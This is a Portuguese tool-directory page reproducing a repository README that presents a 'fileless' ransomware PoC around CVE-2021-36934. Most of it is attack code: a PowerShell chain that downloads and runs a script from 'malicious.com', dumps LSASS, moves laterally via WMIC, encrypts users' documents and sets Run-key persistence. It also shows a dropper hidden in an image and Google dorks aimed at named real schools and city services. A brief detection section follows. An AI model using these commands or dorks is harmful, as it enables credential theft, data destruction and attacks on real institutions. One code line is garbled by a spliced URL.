Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Why-so-Serious-SAM — PoC malware que usa o exploit CVE-2021-36934 (ACLs inadequadas em cópias de sombra) usando um método fileless de red team no Windows 10/11 com LOLBins, extraindo os hives SYSTEM e SAM para hashes NTLM locais. | Kitploit
Ferramentas/GitHubGitHub/p1rat3r00t/why-so-serious-sam
Escalada de PrivilégiosExploraçãoMovimento LateralPós-ExploraçãoCTFTestes de PenetraçãoAprendizado e EducaçãoRed TeamingLabs e Prática

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
GitHubp1rat3r00t/why-so-serious-sam

Why-so-Serious-SAM

PoC malware que usa o exploit CVE-2021-36934 (ACLs inadequadas em cópias de sombra) usando um método fileless de red team no Windows 10/11 com LOLBins, extraindo os hives SYSTEM e SAM para hashes NTLM locais.

Ver RepositórioSite
1há 1 anoAinda não revisado

PoC do Exploit 'Fileless' HiveNightmare:

Screenshot 2025-05-21 001453


Índice

  • Visão Geral
  • Funcionalidades
  • Exemplo de Simulação em Laboratório
  • Reconhecimento com Google Dorks
  • Visão Geral de LOLBins
  • Incorporação de Dropper sem Arquivo
  • Exploração do Print Spooler e HiveNightmare
  • Injeção Refletiva de DLL
  • Mapeamento MITRE ATT&CK
  • Detecção e Mitigação
  • Aviso Legal
  • Referências e Leitura Adicional

Visão Geral

CVE-2021-36934/HiveNightmare é um projeto de pesquisa educacional de equipe red/purple que simula um framework de ataque de malware fileless no Windows 11. Ele permite a emulação de cadeias de eliminação de adversários do mundo real usando técnicas do MITRE ATT&CK, com foco em operações furtivas e sem arquivos (fileless).

Aviso: Apenas para pesquisa e treinamento em laboratórios isolados. Não use em sistemas de produção ou não autorizados.


Funcionalidades

  • Simula ataques de ransomware/wiperware fileless de ponta a ponta
  • Demonstra o uso de Binários Legítimos do Windows (LOLBins)
  • Mostra acesso a credenciais, elevação de privilégio, movimento lateral e persistência
  • Contém exemplos práticos de laboratório e reconhecimento
  • Mapeia para MITRE ATT&CK para exercícios de detecção da equipe azul

Exemplo de Simulação em Laboratório

A simulação PowerShell a seguir demonstra uma cadeia de ataque ransomware fileless típica usando ferramentas nativas do Windows (LOLBins):

root@kitploit:~
# Acesso Inicial: Carregar dropper
IEX(New-Object Net.WebClient).DownloadString("http://malicious.com/dropper.ps1")

# Execução: Decodificar e carregar payload em memória
$bytes = [System.Convert]::FromBase64String("[Base64Payload]") 
[System.Reflection.Assembly]:https://raw.githubusercontent.com/p1rat3r00t/why-so-serious-sam/HEAD/:Load($bytes)

# Elevação de Privilégio
Start-Process powershell -Args "-ExecutionPolicy Bypass -File C:\Temp\elevate.ps1" -Verb RunAs

# Acesso a Credenciais
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id C:\Temp\lsass.dmp full

# Movimento Lateral
wmic /node:targetPC process call create "powershell.exe -File \\share\payload.ps1"

# Exemplo de Criptografia de Arquivos
$files = Get-ChildItem -Path "C:\Users\*\Documents" -Include *.docx,*.pdf -Recurse
foreach ($file in $files) {
  $data = Get-Content $file.FullName -Raw
  $aes = New-Object System.Security.Cryptography.AesManaged
  $aes.Key = [Text.Encoding]::UTF8.GetBytes("RANDOM-GEN-KEY-1234567890123456")
  $aes.IV = New-Object byte[] 16
  $enc = $aes.CreateEncryptor().TransformFinalBlock([Text.Encoding]::UTF8.GetBytes($data), 0, $data.Length)
  Set-Content -Path $file.FullName -Value ([Convert]::ToBase64String($enc))
}

# Persistência
Set-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "ransomware" -Value "powershell -File C:\Temp\persist.ps1"

Reconhecimento com Google Dorks

Exemplo de Objetivo: Identificar serviços de impressora publicamente expostos em Moberly, Missouri, potencialmente vulneráveis a exploits como PrintNightmare.

Consultas Google Dork de Exemplo:

root@kitploit:~
inurl:"/hp/device/this.LCDispatcher" "Moberly"
intitle:"Printer Status" "Moberly Public Schools"
intitle:"Web Image Monitor" inurl:"/wim" "Moberly"
inurl:"/printer/main.html" "City of Moberly"
intitle:"Web Jetadmin" "Moberly"
inurl:"/printers/" "Moberly"
inurl:"/PPS/public/" "Moberly"
intitle:"Konica Minolta" inurl:"/wcd/" "Moberly"
intitle:"PaperCut MF" "Moberly"
intitle:"Lexmark" inurl:"/printer/" "Moberly"
intitle:"Canon Remote UI" "Moberly"
intitle:"EpsonNet Config" "Moberly"

Visão Geral de LOLBins

Living Off the Land Binaries (LOLBins) são binários legítimos e confiáveis do Windows que são frequentemente abusados por adversários para contornar controles de segurança e executar código malicioso sem arquivos (fileless).

Exemplo de Uso (Ataque a Serviço de Impressão):

root@kitploit:~
rundll32.exe \\10.10.X.X\shared\payload.dll,ReflectEntry

Atacantes usam LOLBins como rundll32.exe, regsvr32.exe e powershell.exe para executar payloads de compartilhamentos de rede, frequentemente após identificar impressoras ou servidores expostos por meio de reconhecimento.


Incorporação de Dropper sem Arquivo

Objetivo: Entregar payloads de forma oculta, incorporando arquivos compactados dentro de imagens e extraindo-os usando ferramentas nativas.

Passos:

  1. Incorporar Payload:

    root@kitploit:~
    copy /b nsfw.jpg + payload.7z nsfw.jpg
    
  2. Extrair e Decodificar:

    root@kitploit:~
    certutil -decode nsfw.jpg dropper.7z
    7z x dropper.7z -oC:\Users\Public\
    

Este método contorna a filtragem tradicional de extensões de arquivo e aproveita ferramentas integradas para uma entrega evasiva.


Injeção Refletiva de DLL

Técnica: Carregar e executar uma DLL maliciosa diretamente na memória usando carregamento refletivo.

Exemplo:

root@kitploit:~
rundll32.exe \\10.10.X.X\share\nsfw.dll,ReflectEntry

Isso permite execução furtiva em memória, sem deixar artefatos no disco.


Mapeamento MITRE ATT&CK


Detecção e Mitigação

Detecção

  • Sysmon + Regras Sigma:

    • Monitore rundll32.exe carregando DLLs não do sistema
    • Observe o uso anormal de certutil.exe, regsvr32.exe, mshta.exe
    • Rastreie acesso a volumes de sombra por não administradores
  • Exemplos de SIEM (ELK/Splunk):

    • Alertas sobre execução a partir de compartilhamentos públicos
    • Anomalias de processos pai/filho (ex.: explorer.exe gerando rundll32.exe)
    • Comandos codificados suspeitos no PowerShell ou CMD

Mitigação

  • Desabilite o Print Spooler onde não for necessário:
    root@kitploit:~
    Stop-Service -Name Spooler -Force
    Set-Service -Name Spooler -StartupType Disabled
    
  • Aplique todos os patches de segurança e endureça as ACLs
  • Bloqueie ou restrinja LOLBins com AppLocker ou WDAC
  • Use soluções de EDR que detectam carregamento refletivo de DLL e ataques em memória

Aviso Legal

Todo o conteúdo, código e técnicas neste repositório são exclusivamente para fins educacionais e de teste de penetração autorizado. Não use qualquer parte deste projeto fora de ambientes controlados e isolados e sem permissão explícita. Os autores não assumem nenhuma responsabilidade por uso indevido.


Referências e Leitura Adicional

  • LOLOL Farm – Playground de LOLBins
  • LOLGEN – Gere Cadeias de LOLBins
  • Detectando SeriousSam
  • Introdução à Injeção de DLL
  • Cadeia de Exploração do Print Spooler
  • Malware sem Arquivo – Wikipedia
  • PrintSpoofer (Original)
  • HiveNightmare
  • Mitre Attck T1055
  • Demonstração do HiveNightmare

Mantenha-se seguro, pesquise com responsabilidade e sempre use de maneira legal e ética.

Baixar ferramenta
FaseTécnicaIDDescrição
Acesso InicialContas Válidas / Comprometimento Drive-byT1078, T1189Comprometer interfaces de impressão voltadas ao público
ExecuçãoSide-Loading de DLL / LOLBinsT1218, T1055.001Executar DLLs reflexivamente por meio de binários confiáveis
Elevação de PrivilégioExploração do Print Spooler / Abuso de ACL do HiveT1068, T1003.002Acesso em nível de SYSTEM e extração de hash SAM
Defesa EvasivaExecução sem Arquivo / Arquivos OfuscadosT1027, T1202Payloads codificados entregues via certutil, mshta, etc.
Acesso a CredenciaisDespejo de LSASS / Acesso ao Hive SAMT1003Despejo de credenciais pós-HiveNightmare
Movimento LateralEnumeração de Compartilhamentos SMB/NetT1021.002Propagação por compartilhamentos de impressora ou enumeração de spooler
ImpactoDestruição / Criptografia de DadosT1485, T1486Wiperware sem arquivo acionado por payloads de DLL